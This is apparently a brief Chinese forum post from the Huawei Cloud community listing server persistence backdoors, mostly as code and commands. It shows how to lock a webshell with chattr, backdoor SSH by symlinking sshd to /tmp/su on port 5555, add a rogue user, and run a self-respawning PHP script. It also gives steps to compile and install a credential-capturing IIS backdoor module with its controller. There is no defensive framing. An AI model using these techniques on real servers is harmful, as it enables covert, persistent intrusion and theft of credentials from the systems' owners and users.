文件上锁
1
2
3
|
chattr +i webshell.php
lsattr webshell.php
chattr -i webshell.php
|
ssh 软链接
1
2
|
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;
useradd test -p test
|
不死马
访问该 php 文件,会生成一个木马文件用于连接
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
<?php
ignore_user_abort();
set_time_limit(0);
$interval = 5;
do {
$filename = 'test.php';
if(file_exists($filename)) {
echo "xxx";
}
else {
$file = fopen("test.php", "w");
$txt = "<?php phpinfo();?>\n";
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>
|
iis 后门
https://github.com/ygwlgGiao/iis-raid-backdoor
使用 vs2019 进行编译,functions.h 可修改配置信息
1
2
3
4
|
functions.h
#define COM_HEADER "X-Chrome-Variations" 传输指令和接收数据的头部字段
#define PASS_FILE "C:\\Windows\\Temp\\creds.db" 保存到web请求服务端的位置
#define PASSWORD "SIMPLEPASS" 传输密码
|
生成后把 IIS-Backdoor.dll 放到 c 盘目录下,放置其他目录下面语句要进行适当的更改
1
2
|
C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:iisModule /image:"c:\IIS-Backdoor.dll" /add:true
python iis_controller.py --url http://x.x.x.x --password SIMPLEPASS
|
查看 iis 管理器模块,可发现新增的内容
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
评论(0)